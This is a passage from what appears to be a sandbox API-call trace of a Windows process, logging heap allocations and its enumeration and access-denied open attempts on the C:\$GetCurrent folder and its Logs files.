hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0059.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cce0 [0059.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0059.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0059.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0059.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0059.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0059.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0059.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0059.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886f8 [0059.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0059.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x884a0 [0059.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886f8 | out: hHeap=0x20000) returned 1 [0059.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0059.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x76460 [0059.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0059.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x77110 [0059.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0059.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7ce80 [0059.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f3a8 [0059.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x76e00 [0059.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x76e70 [0059.537] AreFileApisANSI () returned 1 [0059.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$GetCurrent", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent", lpUsedDefaultChar=0x0) returned 15 [0059.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cce0 [0059.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0059.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x38) returned 0x78ed0 [0059.538] AreFileApisANSI () returned 1 [0059.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 15 [0059.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1e) returned 0x88388 [0059.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88388, cchWideChar=15 | out: lpWideCharStr="C:\\$GetCurrent") returned 15 [0059.538] CreateFileW (lpFileName="C:\\$GetCurrent" (normalized: "c:\\$getcurrent"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0059.538] GetLastError () returned 0x5 [0059.538] GetLastError () returned 0x5 [0059.538] SetLastError (dwErrCode=0x5) [0059.538] GetLastError () returned 0x5 [0059.538] SetLastError (dwErrCode=0x5) [0059.538] GetLastError () returned 0x5 [0059.538] SetLastError (dwErrCode=0x5) [0059.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0059.539] AreFileApisANSI () returned 1 [0059.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 15 [0059.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1e) returned 0x886f8 [0059.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x886f8, cchWideChar=15 | out: lpWideCharStr="C:\\$GetCurrent") returned 15 [0059.539] CreateFileW (lpFileName="C:\\$GetCurrent" (normalized: "c:\\$getcurrent"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0059.539] GetLastError () returned 0x5 [0059.539] GetLastError () returned 0x5 [0059.539] SetLastError (dwErrCode=0x5) [0059.539] GetLastError () returned 0x5 [0059.539] SetLastError (dwErrCode=0x5) [0059.539] GetLastError () returned 0x5 [0059.539] SetLastError (dwErrCode=0x5) [0059.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886f8 | out: hHeap=0x20000) returned 1 [0059.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0059.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0059.539] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.539] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.539] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.539] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0059.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0059.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0059.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0059.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0059.539] FindNextFileW (in: hFindFile=0x78dd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0059.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0059.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0059.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0059.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886f8 [0059.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0059.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0059.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0059.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886f8 | out: hHeap=0x20000) returned 1 [0059.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cce0 [0059.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0059.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0059.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0059.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e500 [0059.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0059.540] FindFirstFileExW (in: lpFileName="C:\\$GetCurrent\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78e50 [0059.542] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.542] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1 [0059.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e500 | out: hHeap=0x20000) returned 1 [0059.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0059.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x76bd0 [0059.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0059.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf60 [0059.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0059.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf60 | out: hHeap=0x20000) returned 1 [0059.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0059.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d030 [0059.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0059.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d030 | out: hHeap=0x20000) returned 1 [0059.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0059.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0059.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e500 [0059.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0059.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0059.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e500 | out: hHeap=0x20000) returned 1 [0059.542] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.542] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.542] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.542] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e500 [0059.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0059.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0059.542] AreFileApisANSI () returned 1 [0059.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$GetCurrent\\Logs", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\Logs", lpUsedDefaultChar=0x0) returned 20 [0059.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886f8 [0059.542] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.542] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0059.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0059.543] AreFileApisANSI () returned 1 [0059.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x886f8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0059.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x28) returned 0x7a7b8 [0059.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x886f8, cbMultiByte=-1, lpWideCharStr=0x7a7b8, cchWideChar=20 | out: lpWideCharStr="C:\\$GetCurrent\\Logs") returned 20 [0059.543] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs" (normalized: "c:\\$getcurrent\\logs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0059.543] GetLastError () returned 0x5 [0059.543] GetLastError () returned 0x5 [0059.543] SetLastError (dwErrCode=0x5) [0059.543] GetLastError () returned 0x5 [0059.543] SetLastError (dwErrCode=0x5) [0059.543] GetLastError () returned 0x5 [0059.543] SetLastError (dwErrCode=0x5) [0059.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a7b8 | out: hHeap=0x20000) returned 1 [0059.543] AreFileApisANSI () returned 1 [0059.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x886f8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0059.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x28) returned 0x7ac38 [0059.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x886f8, cbMultiByte=-1, lpWideCharStr=0x7ac38, cchWideChar=20 | out: lpWideCharStr="C:\\$GetCurrent\\Logs") returned 20 [0059.543] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs" (normalized: "c:\\$getcurrent\\logs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0059.544] GetLastError () returned 0x5 [0059.544] GetLastError () returned 0x5 [0059.544] SetLastError (dwErrCode=0x5) [0059.544] GetLastError () returned 0x5 [0059.544] SetLastError (dwErrCode=0x5) [0059.544] GetLastError () returned 0x5 [0059.544] SetLastError (dwErrCode=0x5) [0059.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ac38 | out: hHeap=0x20000) returned 1 [0059.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0059.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0059.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886f8 | out: hHeap=0x20000) returned 1 [0059.544] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.544] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.544] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.544] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0059.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0059.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0059.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0059.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0059.544] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0059.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0059.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0059.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0059.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0059.544] FindFirstFileExW (in: lpFileName="C:\\$GetCurrent\\Logs\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78f10 [0059.547] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.547] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x542c8aac, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0xafe5f7a, ftLastWriteTime.dwHighDateTime=0x1d3273e, nFileSizeHigh=0x0, nFileSizeLow=0xa6b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="downlevel_2017_09_07_02_02_39_766.log", cAlternateFileName="DOWNLE~1.LOG")) returned 1 [0059.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0059.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885e0 [0059.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0059.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885e0 | out: hHeap=0x20000) returned 1 [0059.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0059.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0059.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x76d90 [0059.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0059.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0059.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0059.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0059.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0059.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0059.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76d90 | out: hHeap=0x20000) returned 1 [0059.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0059.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0059.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0059.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x76d90 [0059.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0059.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0059.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f608 [0059.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0059.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f608 | out: hHeap=0x20000) returned 1 [0059.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0059.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f608 [0059.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0059.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f608 | out: hHeap=0x20000) returned 1 [0059.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0059.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0059.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0059.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0059.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0059.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0059.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0059.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0059.548] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.548] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.548] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.548] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0059.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e500 | out: hHeap=0x20000) returned 1 [0059.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0059.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0059.548] AreFileApisANSI () returned 1 [0059.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log", lpUsedDefaultChar=0x0) returned 58 [0059.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0059.548] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, 